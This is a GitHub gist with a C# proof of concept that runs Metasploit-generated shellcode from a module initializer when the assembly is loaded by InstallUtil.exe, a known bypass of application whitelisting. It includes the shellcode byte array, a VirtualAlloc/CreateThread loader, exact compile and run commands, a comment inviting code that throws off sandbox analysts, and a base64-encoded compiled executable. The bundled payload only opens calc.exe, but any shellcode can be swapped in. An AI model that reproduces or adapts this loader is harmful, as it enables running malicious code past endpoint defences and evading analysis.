Skip to content

Instantly share code, notes, and snippets.

@DanielRTeixeira
Forked from nicholasmckinney/execalc.cs
Created November 2, 2017 15:25
Show Gist options
  • Save DanielRTeixeira/c0ce6a3faa375f3ddd27cddffb043c20 to your computer and use it in GitHub Desktop.
Save DanielRTeixeira/c0ce6a3faa375f3ddd27cddffb043c20 to your computer and use it in GitHub Desktop.
Module Initializer ShellCode Example
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Step One:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /platform:x86 /out:execcalc.exe execcalc.cs
Step Two:
C:\Tools\ModuleInitializer>InjectModuleInitializer.exe /m:Shellcode::Exec execcalc.exe
The Tool InjectModuleInitializer is found here:
http://einaregilsson.com/module-initializers-in-csharp/
Step Three:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U execcalc.exe
By simply loading the assembly. InstallUtil Trips the Module Initializer
*/
//root@infosec:~# msfvenom --payload windows/exec CMD=calc.exe EXITFUNC=thread
public class Program
{
public static void Main()
{
Console.WriteLine("Hey There From Main()");
//Add any behaviour here to throw off sandbox execution/analysts :)
}
}
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
//The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
public override void Uninstall(System.Collections.IDictionary savedState)
{
Console.WriteLine("Hello There From Uninstall");
}
}
public class Shellcode
{
public static void Exec()
{
// native function's compiled code
// generated with metasploit
byte[] shellcode = new byte[193] {
0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00 };
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode .Length,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
// prepare data
IntPtr pinfo = IntPtr.Zero;
// execute native code
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
return;
}
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern bool CloseHandle(IntPtr handle);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
}
<Proof Of Concept Binary>
data:application/x-msdownload;base64,TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAG228VUAAAAAAAAAAOAAAgELAQgAAAwAAAAIAAAAAAAAHisAAAAgAAAAAAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAMwqAABPAAAAAEAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAJAsAAAAgAAAADAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAAAGAAAAQAAAAAYAAAAOAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAFAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAKwAAAAAAAEgAAAACAAUA2CEAAPQIAAADAAAAAgAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABooBgAABioANgByAQAAcCgBAAAKACoAAB4CKAIAAAoqNgByLQAAcCgBAAAKACoAAB4CKAMAAAoqEzAGAGMAAAABAAARACDBAAAAjQYAAAEl0AMAAAQoBQAACgoWBo5pfgEAAAR+AgAABCgHAAAGCwYWB24oBgAACgaOaSgHAAAKAH4IAAAKDBYNfggAAAoTBBYWBxEEFhIDKAgAAAYMCBUoCgAABiYqAB4CKAIAAAoqSiAAEAAAgAEAAAQfQIACAAAEKgD86IIAAABgieUxwGSLUDCLUgyLUhSLcigPt0omMf+sPGF8Aiwgwc8NAcfi8lJXi1IQi0o8i0wReONIAdFRi1kgAdOLSRjjOkmLNIsB1jH/rMHPDQHHOOB19gN9+Dt9JHXkWItYJAHTZosMS4tYHAHTiwSLAdCJRCQkW1thWVpR/+BfX1qLEuuNXWoBjYWyAAAAUGgxi2+H/9W78LWiVmimlb2d/9U8BnwKgPvgdQW7RxNyb2oAU//VY2FsYy5leGUAAAAAQlNKQgEAAQAAAAAADAAAAHY0LjAuMzAzMTkAAAAABQB0AAAAHAMAACN+AACQAwAApAMAACNTdHJpbmdzAAAAADQHAABkAAAAI1VTAJgHAAAQAAAAI0dVSUQAAACoBwAATAEAACNCbG9iAAAAAAAAAAAAAAAAAAAAAgAAClfVAjQJAgAAAPoBMwAWAAABAAAAEAAAAAYAAAADAAAADAAAAA4AAAAMAAAABQAAAAEAAAABAAAAAQAAAAEAAAAEAAAAAQAAAAEAAAADAAAAAQAAAAAAAQABAAAAAAAGAGUAPQAGAGwAPQAKAJAAIAAGAKQAsAAOAM4A5AAGACYBPQAGACsBOgEGAGoBPQAGAHABPQAGAIMBPQAGAJYBngEGAPgCOgEGADEDPQAGADsDOgEGAFkDOgEGAHkDkwMAAAAATQAAAAAAAQABAAEAEABdAAAABQABAAIAAQAQAIkAAAANAAEABAABABAA+gAAAAUAAQAGAAAAAACfAgAABQADAA0AEwEAABMDAAA1AAQADQARAAQBMQARAA8BMQATAeQCdABQIAAAAAAQGFYAEwABAFggAAAAAJYAfgATAAEAaCAAAAAAhhiDABwAAQBwIAAAAADGAJoAIAABAIAgAAAAAIYYgwAcAAIAiCAAAAAAlgDHARMAAgAAAAAAgACRIMwBVgACAAAAAACAAJEgBQJeAAYAAAAAAIAAkSBhAmkADAAAAAAAgACRIHQCbgANAPggAAAAAIYYgwAcAA8AACEAAAAAkRhWABMADwAAAAEAwwAAAAEA2QEAAAIA5QEAAAMA6gEAAAQA+wEAAAEAEgIAAAIAJQIAAAMAMQIAAAQAQAIAAAUARgIAAAYAVgIAAAEAbQIAAAEAiAIAAAIAkAIRAHQAFwAJAIMAHAAZAIMAHAApAIMAJgA5AFoBPQBRAIoBRQBZAL0BSgBRAMIBUwBhAIMAHABxAIMAHAB5AIMAnACBAIMAHAAnAGMAeAAuAFsAoQAuAFMAfQBjACMAKwCjAEsAeAAIAAYAqgABAMEAAAAGADQARAAAAQ8AzAEBAAABEQAFAgEAAAETAGECAQAAARUAdAIBABQhAAADAASAAAAAAAAAAAAAAAAAAAAAAA4AAAAEAAAAAAAAAAAAAAABABcAAAAAAAQAAAAAAAAAAAAAAAoAIAAAAAAABAAAAAAAAAAAAAAAAQA9AAAAAAAGAAUAAGV4ZWNjYWxjLmV4ZQBleGVjY2FsYwBtc2NvcmxpYgBTeXN0ZW0uQ29uZmlndXJhdGlvbi5JbnN0YWxsAFN5c3RlbQBrZXJuZWwzMgA8TW9kdWxlPgAuY2N0b3IAUHJvZ3JhbQBPYmplY3QAQ29uc29sZQBXcml0ZUxpbmUATWFpbgAuY3RvcgBTYW1wbGUASW5zdGFsbGVyAFVuaW5zdGFsbABJRGljdGlvbmFyeQBTeXN0ZW0uQ29sbGVjdGlvbnMAc2F2ZWRTdGF0ZQBSdW5JbnN0YWxsZXJBdHRyaWJ1dGUAU3lzdGVtLkNvbXBvbmVudE1vZGVsAFNoZWxsY29kZQBNRU1fQ09NTUlUAFBBR0VfRVhFQ1VURV9SRUFEV1JJVEUAQnl0ZQBSdW50aW1lSGVscGVycwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAEluaXRpYWxpemVBcnJheQBBcnJheQBSdW50aW1lRmllbGRIYW5kbGUASW50UHRyAG9wX0V4cGxpY2l0AE1hcnNoYWwAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAENvcHkAWmVybwBFeGVjAFZpcnR1YWxBbGxvYwBscFN0YXJ0QWRkcgBzaXplAGZsQWxsb2NhdGlvblR5cGUAZmxQcm90ZWN0AENyZWF0ZVRocmVhZABscFRocmVhZEF0dHJpYnV0ZXMAZHdTdGFja1NpemUAbHBTdGFydEFkZHJlc3MAcGFyYW0AZHdDcmVhdGlvbkZsYWdzAGxwVGhyZWFkSWQAQ2xvc2VIYW5kbGUAaGFuZGxlAFdhaXRGb3JTaW5nbGVPYmplY3QAaEhhbmRsZQBkd01pbGxpc2Vjb25kcwA8UHJpdmF0ZUltcGxlbWVudGF0aW9uRGV0YWlscz57Q0YzRTJCNDItMDE5Qy00Qjc1LTlDMTAtN0UwMzBDODc3RjJBfQAkJG1ldGhvZDB4NjAwMDAwNS0xAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAF9fU3RhdGljQXJyYXlJbml0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
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment